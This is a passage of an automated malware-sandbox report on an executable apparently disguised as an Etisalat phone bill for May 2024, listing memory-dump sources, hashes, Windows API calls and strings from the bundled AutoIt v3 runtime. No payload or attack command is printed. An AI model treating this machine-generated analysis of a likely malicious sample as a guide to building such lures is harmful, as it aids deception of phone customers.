                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                      • String ID:
                                      • API String ID: 4124339563-0
                                      • Opcode ID: 670d31382f08ede129965282de5c5d3f308cab93ce108fa54e73ab58b44927a4
                                      • Instruction ID: 615ab5df1a914e2a0cf8690e5cf2c78d3dd7aca7b06984ea51ed415c43162261
                                      • Opcode Fuzzy Hash: 670d31382f08ede129965282de5c5d3f308cab93ce108fa54e73ab58b44927a4
                                      • Instruction Fuzzy Hash: 31A19271408386EFD7109F65DC48A6B7BE9FF88321F104A29F9629B1E1DB34E944CB52
                                      APIs
                                      • DestroyWindow.USER32(?,?,?), ref: 00B62CA2
                                      • DeleteObject.GDI32(00000000), ref: 00B62CE8
                                      • DeleteObject.GDI32(00000000), ref: 00B62CF3
                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00B62CFE
                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00B62D09
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B9C68B
                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B9C6C4
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B9CAED
                                        • Part of subcall function 00B61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B62036,?,00000000,?,?,?,?,00B616CB,00000000,?), ref: 00B61B9A
                                      • SendMessageW.USER32(?,00001053), ref: 00B9CB2A
                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B9CB41
                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B9CB57
                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B9CB62
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                      • String ID: 0
                                      • API String ID: 464785882-4108050209
                                      • Opcode ID: 59b2460ba32a891d6261bc8098b749b63abe1833ea96120f8c014b4e7b63fe9d
                                      • Instruction ID: c3e9c4cd82f0948278a4c90c842c49cd9658ccbbce9bb16b0ccfd26d1bdc4c53
                                      • Opcode Fuzzy Hash: 59b2460ba32a891d6261bc8098b749b63abe1833ea96120f8c014b4e7b63fe9d
                                      • Instruction Fuzzy Hash: AE128D30604642EFEB25CF24C888BA9BBE5FF45310F5445B9E999DB262CB35EC41CB91
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 00BD77F1
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BD78B0
                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00BD78EE
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00BD7900
                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00BD7946
                                      • GetClientRect.USER32(00000000,?), ref: 00BD7952
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00BD7996
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BD79A5
                                      • GetStockObject.GDI32(00000011), ref: 00BD79B5
                                      • SelectObject.GDI32(00000000,00000000), ref: 00BD79B9
                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00BD79C9
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BD79D2
                                      • DeleteDC.GDI32(00000000), ref: 00BD79DB
                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BD7A07
                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00BD7A1E
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00BD7A59
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BD7A6D
                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00BD7A7E
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00BD7AAE
                                      • GetStockObject.GDI32(00000011), ref: 00BD7AB9
                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BD7AC4
                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00BD7ACE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: 28a8865fbdd62e8c3041dfa9440be2076ecc8cba1c89c9e9ca549f2c7a7f6262
                                      • Instruction ID: 6f6a938ebcbba2cb1cc7218d401f473bded4c3fbcd1069ce778e0e3c2f24194e
                                      • Opcode Fuzzy Hash: 28a8865fbdd62e8c3041dfa9440be2076ecc8cba1c89c9e9ca549f2c7a7f6262
                                      • Instruction Fuzzy Hash: F5A16271A40215BFEB14DBA4DC4AFAEBBB9EB44710F104155FA15AB2E0DB74AD01CB60
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00BCAF89
                                      • GetDriveTypeW.KERNEL32(?,00BEFAC0,?,\\.\,00BEF910), ref: 00BCB066
                                      • SetErrorMode.KERNEL32(00000000,00BEFAC0,?,\\.\,00BEF910), ref: 00BCB1C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 8a11b9c4d0cbb8dc831ffff24d177e259de841d75e08c13a8b3f00186db46f34
                                      • Instruction ID: 58d3a5deb759e3bb4a62a359d5250906574327b61ebdcc85a9e2ae4d6518a468
                                      • Opcode Fuzzy Hash: 8a11b9c4d0cbb8dc831ffff24d177e259de841d75e08c13a8b3f00186db46f34
                                      • Instruction Fuzzy Hash: A9518530A95245AB8B14DB10C9A3FBD73F1EB15742F2840EDE41AB72D1C7759E819B82
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 1038674560-86951937
                                      • Opcode ID: cd277d26e0fb8b9c2f29d620bb90e875ea8fc817e13a6cef662efb5d2e5b4298
                                      • Instruction ID: 4bbbdf3aaa9f8ccf7bb0c503c0ebdaf2be2a836525a64838f52e30e304282e70
                                      • Opcode Fuzzy Hash: cd277d26e0fb8b9c2f29d620bb90e875ea8fc817e13a6cef662efb5d2e5b4298
                                      • Instruction Fuzzy Hash: D0810570641245FBCB24BBA0CC93FBE77D8EF11B00F0440F5F941AA1A2EB68EA55C661
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 00BEAB99
                                      • SetTextColor.GDI32(?,?), ref: 00BEAB9D
                                      • GetSysColorBrush.USER32(0000000F), ref: 00BEABB3
                                      • GetSysColor.USER32(0000000F), ref: 00BEABBE
                                      • CreateSolidBrush.GDI32(?), ref: 00BEABC3
                                      • GetSysColor.USER32(00000011), ref: 00BEABDB
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BEABE9
                                      • SelectObject.GDI32(?,00000000), ref: 00BEABFA
                                      • SetBkColor.GDI32(?,00000000), ref: 00BEAC03
                                      • SelectObject.GDI32(?,?), ref: 00BEAC10
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00BEAC2F
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BEAC46
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00BEAC5B
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BEACA7
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BEACCE
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00BEACEC
                                      • DrawFocusRect.USER32(?,?), ref: 00BEACF7
                                      • GetSysColor.USER32(00000011), ref: 00BEAD05
                                      • SetTextColor.GDI32(?,00000000), ref: 00BEAD0D
                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BEAD21
                                      • SelectObject.GDI32(?,00BEA869), ref: 00BEAD38
                                      • DeleteObject.GDI32(?), ref: 00BEAD43
                                      • SelectObject.GDI32(?,?), ref: 00BEAD49
                                      • DeleteObject.GDI32(?), ref: 00BEAD4E
                                      • SetTextColor.GDI32(?,?), ref: 00BEAD54
                                      • SetBkColor.GDI32(?,?), ref: 00BEAD5E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: 2d59db629dc23eb90b4886b9aebc4f5a5cb98c702af4e086dbf88c3908844570
                                      • Instruction ID: 831b0484fc510d25563e54633e9bbcfb43370f80fce646c379979629dff5672a
                                      • Opcode Fuzzy Hash: 2d59db629dc23eb90b4886b9aebc4f5a5cb98c702af4e086dbf88c3908844570
                                      • Instruction Fuzzy Hash: 45617F71900259EFDF119FA5DC88EAE7BB9EF08320F208165F911AB2A1DB719D40DB90
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BE8D34
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BE8D45
                                      • CharNextW.USER32(0000014E), ref: 00BE8D74
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BE8DB5
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BE8DCB
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BE8DDC
                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BE8DF9
                                      • SetWindowTextW.USER32(?,0000014E), ref: 00BE8E45
                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BE8E5B
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BE8E8C
                                      • _memset.LIBCMT ref: 00BE8EB1
                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BE8EFA
                                      • _memset.LIBCMT ref: 00BE8F59
                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BE8F83
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BE8FDB
                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00BE9088
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00BE90AA
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BE90F4
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BE9121
                                      • DrawMenuBar.USER32(?), ref: 00BE9130
                                      • SetWindowTextW.USER32(?,0000014E), ref: 00BE9158
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                      • String ID: 0
                                      • API String ID: 1073566785-4108050209
                                      • Opcode ID: 22e2d7bbf66c10453b1fb20a210decc3f8f32d1cecd00ef79ec351ba78405a39
                                      • Instruction ID: ddc5f6d98a31a189641dcc0427ee4ec935a5103e47baed80fa5b63de5b963fc9
                                      • Opcode Fuzzy Hash: 22e2d7bbf66c10453b1fb20a210decc3f8f32d1cecd00ef79ec351ba78405a39
                                      • Instruction Fuzzy Hash: 1AE17470900299AFDF209F65CC84EEE7BF9EF05710F108199F919AB290DB709A85DF61
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00BE4C51
                                      • GetDesktopWindow.USER32 ref: 00BE4C66
                                      • GetWindowRect.USER32(00000000), ref: 00BE4C6D
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00BE4CCF
                                      • DestroyWindow.USER32(?), ref: 00BE4CFB
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BE4D24
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BE4D42
                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BE4D68
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00BE4D7D
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BE4D90
                                      • IsWindowVisible.USER32(?), ref: 00BE4DB0
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BE4DCB
                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BE4DDF
                                      • GetWindowRect.USER32(?,?), ref: 00BE4DF7
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00BE4E1D
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00BE4E37
                                      • CopyRect.USER32(?,?), ref: 00BE4E4E
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00BE4EB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: a7cd755066dffbd6a811623c0b09c38650faba989475f8f1217138ec93a8673c
                                      • Instruction ID: 80ab8e78d2af36e4a5e59592c031f16aa0d58eb95ae392b55c10a302af0be521
                                      • Opcode Fuzzy Hash: a7cd755066dffbd6a811623c0b09c38650faba989475f8f1217138ec93a8673c
                                      • Instruction Fuzzy Hash: 3AB18F71604381AFDB04DF65C889B6ABBE4FF88314F00896CF5999B2A1DB75EC05CB91
                                      APIs
                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00BC46E8
                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00BC470E
                                      • _wcscpy.LIBCMT ref: 00BC473C
                                      • _wcscmp.LIBCMT ref: 00BC4747
                                      • _wcscat.LIBCMT ref: 00BC475D
                                      • _wcsstr.LIBCMT ref: 00BC4768
                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00BC4784
                                      • _wcscat.LIBCMT ref: 00BC47CD
                                      • _wcscat.LIBCMT ref: 00BC47D4
                                      • _wcsncpy.LIBCMT ref: 00BC47FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 699586101-1459072770
                                      • Opcode ID: b0b59e73cfce2d466fd3ddba6b2e089d95c2ea088ba1ce499b4c9abca7a76c45
                                      • Instruction ID: fcc13b7f28e170383648086aacc1eec89902388dfb3087b27ae161377b8e5300
                                      • Opcode Fuzzy Hash: b0b59e73cfce2d466fd3ddba6b2e089d95c2ea088ba1ce499b4c9abca7a76c45
                                      • Instruction Fuzzy Hash: E641E371A002117ADB10BB648C42FBF77FCDF42710F0041EAF904A61A2EF759A01D7A5
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B628BC
                                      • GetSystemMetrics.USER32(00000007), ref: 00B628C4
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B628EF
                                      • GetSystemMetrics.USER32(00000008), ref: 00B628F7
                                      • GetSystemMetrics.USER32(00000004), ref: 00B6291C
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B62939
                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B62949
                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B6297C
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B62990
                                      • GetClientRect.USER32(00000000,000000FF), ref: 00B629AE
                                      • GetStockObject.GDI32(00000011), ref: 00B629CA
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B629D5
                                        • Part of subcall function 00B62344: GetCursorPos.USER32(?), ref: 00B62357
                                        • Part of subcall function 00B62344: ScreenToClient.USER32(00C267B0,?), ref: 00B62374
                                        • Part of subcall function 00B62344: GetAsyncKeyState.USER32(00000001), ref: 00B62399
                                        • Part of subcall function 00B62344: GetAsyncKeyState.USER32(00000002), ref: 00B623A7
                                      • SetTimer.USER32(00000000,00000000,00000028,00B61256), ref: 00B629FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: -es$AutoIt v3 GUI
                                      • API String ID: 1458621304-1956769002
                                      • Opcode ID: 8ccf8f58445cfc092faeb8c218f41379e3be3717b294aa7822eac79991167b8e
                                      • Instruction ID: 57dc454f6c3a7567660c4fbf4561d697b34201c1e612e18e61e7104223b691ec
                                      • Opcode Fuzzy Hash: 8ccf8f58445cfc092faeb8c218f41379e3be3717b294aa7822eac79991167b8e
                                      • Instruction Fuzzy Hash: 75B16E71A0024AEFEF14DFA8DC85BAE7BF4FB08710F108269FA15A7290DB749941CB50
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00BE40F6
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BE41B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 3974292440-719923060
                                      • Opcode ID: ea9b33bf73b0472701e51f0d7bb9b1e759bdedd8fc648a8f1b79e1aac1031174
                                      • Instruction ID: e0fe8de46f1368456e1318133c587de09d5f13e5a36aa0a439cfdcefca79c1a0
                                      • Opcode Fuzzy Hash: ea9b33bf73b0472701e51f0d7bb9b1e759bdedd8fc648a8f1b79e1aac1031174
                                      • Instruction Fuzzy Hash: E9A16F702243429FCB14EF21C991A6AB7E6FF85314F1449E8B9969B3D2DB34EC09CB51
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00BD5309
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00BD5314
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00BD531F
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00BD532A
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00BD5335
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00BD5340
                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00BD534B
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00BD5356
                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00BD5361
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00BD536C
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00BD5377
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00BD5382
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00BD538D
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00BD5398
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00BD53A3
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00BD53AE
                                      • GetCursorInfo.USER32(?), ref: 00BD53BE
                                      • GetLastError.KERNEL32(00000001,00000000), ref: 00BD53E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Cursor$Load$ErrorInfoLast
                                      • String ID:
